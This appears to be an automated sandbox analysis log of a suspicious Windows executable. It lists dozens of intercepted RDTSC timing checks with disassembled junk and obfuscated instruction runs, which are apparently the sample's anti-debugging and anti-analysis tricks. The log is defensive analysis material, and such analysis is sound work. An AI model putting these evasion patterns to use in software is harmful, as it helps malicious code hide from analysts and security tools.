Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4C95C second address: F4C960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D093 second address: F4D099 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D195 second address: F4D19F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D19F second address: F4D1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D1A3 second address: F4D1A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D35A second address: F4D364 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F577C5415C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D364 second address: F4D37D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C53EFD5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D56D second address: F4D577 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F577C5415CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D75B second address: F4D765 instructions: 0x00000000 rdtsc 0x00000002 je 00007F577C53EFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D765 second address: F4D777 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007F577C5415C6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4D777 second address: F4D77C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4DCC0 second address: F4DCCF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4E601 second address: F4E605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4E605 second address: F4E6A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F577C5415D5h 0x0000000d jmp 00007F577C5415CFh 0x00000012 nop 0x00000013 call 00007F577C5415CFh 0x00000018 jnp 00007F577C5415C8h 0x0000001e pop esi 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007F577C5415C8h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b cld 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F577C5415C8h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 mov di, 3A44h 0x0000005c xchg eax, ebx 0x0000005d jnc 00007F577C5415D8h 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4E6A7 second address: F4E6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F577C53EFC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4E6B2 second address: F4E6B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4F7C6 second address: F4F7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F52E28 second address: F52E42 instructions: 0x00000000 rdtsc 0x00000002 je 00007F577C5415CCh 0x00000008 jns 00007F577C5415C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jc 00007F577C5415CCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F51687 second address: F5168B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5168B second address: F516A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F54579 second address: F545E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F577C53EFCCh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F577C53EFC8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F577C53EFC8h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 mov dword ptr [ebp+12BAA654h], edx 0x0000004f movsx esi, cx 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 push ebx 0x00000056 push eax 0x00000057 pop eax 0x00000058 pop ebx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F54323 second address: F5432E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F577C5415C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5432E second address: F54333 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F59D02 second address: F59D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F59D06 second address: F59D10 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F577C53EFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F59D10 second address: F59D15 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F59D15 second address: F59D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5BE38 second address: F5BE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F577C5415C8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov bx, 2363h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F577C5415C8h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 push 00000000h 0x00000043 push ebx 0x00000044 add dword ptr [ebp+12A0199Ch], edx 0x0000004a pop edi 0x0000004b xchg eax, esi 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5BE9A second address: F5BE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5AFD2 second address: F5B071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 mov di, 4C0Fh 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F577C5415C8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov bx, 5EE1h 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 call 00007F577C5415CAh 0x0000003e mov dword ptr [ebp+12A0182Ch], ebx 0x00000044 pop ebx 0x00000045 mov eax, dword ptr [ebp+12A00C75h] 0x0000004b sub ebx, dword ptr [ebp+12A0197Ah] 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push ebx 0x00000056 call 00007F577C5415C8h 0x0000005b pop ebx 0x0000005c mov dword ptr [esp+04h], ebx 0x00000060 add dword ptr [esp+04h], 0000001Bh 0x00000068 inc ebx 0x00000069 push ebx 0x0000006a ret 0x0000006b pop ebx 0x0000006c ret 0x0000006d mov bl, ABh 0x0000006f push eax 0x00000070 je 00007F577C5415DFh 0x00000076 pushad 0x00000077 jmp 00007F577C5415D1h 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5BE9E second address: F5BEA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5BEA4 second address: F5BEAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5BEAA second address: F5BEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5DCA7 second address: F5DCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5DCAB second address: F5DCB5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F577C53EFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5DCB5 second address: F5DCBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5ECE8 second address: F5ED04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5DDCE second address: F5DDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5ED04 second address: F5EDCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007F577C53EFD2h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F577C53EFC8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov dword ptr [ebp+12BAA35Fh], edi 0x00000031 push 00000000h 0x00000033 movsx edi, bx 0x00000036 mov di, E8A6h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007F577C53EFC8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 00000019h 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 jmp 00007F577C53EFD8h 0x0000005b xchg eax, esi 0x0000005c jmp 00007F577C53EFD6h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 ja 00007F577C53EFDCh 0x0000006a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5DDD3 second address: F5DDF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5DDF3 second address: F5DDF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5DEC5 second address: F5DED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F577C5415C6h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5FB27 second address: F5FB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F577C53EFCDh 0x0000000c nop 0x0000000d or di, 8B85h 0x00000012 push 00000000h 0x00000014 mov edi, esi 0x00000016 push 00000000h 0x00000018 or dword ptr [ebp+12B89F78h], ebx 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F577C53EFCEh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5FB5E second address: F5FB75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C5415D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F60B20 second address: F60BCE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F577C53EFD2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007F577C53EFD4h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F577C53EFC8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov bx, C5BAh 0x00000030 push 00000000h 0x00000032 sub dword ptr [ebp+12A02C4Ch], ecx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d call 00007F577C53EFC8h 0x00000042 pop eax 0x00000043 mov dword ptr [esp+04h], eax 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc eax 0x00000050 push eax 0x00000051 ret 0x00000052 pop eax 0x00000053 ret 0x00000054 mov dword ptr [ebp+12B89F78h], esi 0x0000005a ja 00007F577C53EFCCh 0x00000060 push eax 0x00000061 pushad 0x00000062 jmp 00007F577C53EFD7h 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5FCE5 second address: F5FCEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F61C44 second address: F61C49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F61C49 second address: F61C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F577C5415C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 je 00007F577C5415C6h 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F61C61 second address: F61C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F61C67 second address: F61C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F61C6B second address: F61CE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d movsx esi, si 0x00000010 popad 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F577C53EFC8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d clc 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F577C53EFC8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a pushad 0x0000004b mov dword ptr [ebp+12A03687h], ebx 0x00000051 popad 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F61CE4 second address: F61CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F61CE8 second address: F61CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F62C95 second address: F62CAF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F577C5415CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c jng 00007F577C5415CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F62CAF second address: F62CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 mov ebx, ecx 0x00000008 mov ebx, dword ptr [ebp+12A02B43h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 movsx edi, bx 0x00000015 stc 0x00000016 xchg eax, esi 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007F577C53EFC6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F66CC5 second address: F66CCB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F66CCB second address: F66CD5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F577C53EFCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F68BCA second address: F68BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F61ED1 second address: F61EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F577C53EFC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F67E0A second address: F67E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F67E10 second address: F67EAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, dword ptr [ebp+12B8119Bh] 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F577C53EFC8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 push ecx 0x00000033 mov edi, dword ptr [ebp+12A02B0Bh] 0x00000039 pop edi 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 jmp 00007F577C53EFD1h 0x00000046 mov eax, dword ptr [ebp+12A00555h] 0x0000004c mov edi, dword ptr [ebp+12A0290Fh] 0x00000052 mov ebx, dword ptr [ebp+12A02B1Fh] 0x00000058 push FFFFFFFFh 0x0000005a push 00000000h 0x0000005c push edi 0x0000005d call 00007F577C53EFC8h 0x00000062 pop edi 0x00000063 mov dword ptr [esp+04h], edi 0x00000067 add dword ptr [esp+04h], 00000017h 0x0000006f inc edi 0x00000070 push edi 0x00000071 ret 0x00000072 pop edi 0x00000073 ret 0x00000074 push edx 0x00000075 mov edi, 7C0B2646h 0x0000007a pop ebx 0x0000007b mov bx, 2514h 0x0000007f nop 0x00000080 push eax 0x00000081 push edx 0x00000082 jno 00007F577C53EFC8h 0x00000088 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F67EAF second address: F67ED7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F577C5415CAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F709B5 second address: F709B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F727FD second address: F72801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F765F2 second address: F76611 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d push esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop esi 0x00000011 pop esi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jnp 00007F577C53EFD4h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F76611 second address: F76649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F577C5415C6h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f jl 00007F577C5415C6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push esi 0x0000001c pop esi 0x0000001d popad 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F577C5415D3h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F767B3 second address: F767C0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F577C53EFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F767C0 second address: F767E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F577C5415CAh 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 jmp 00007F577C5415CCh 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F78144 second address: F78149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7E9FD second address: F7EA08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
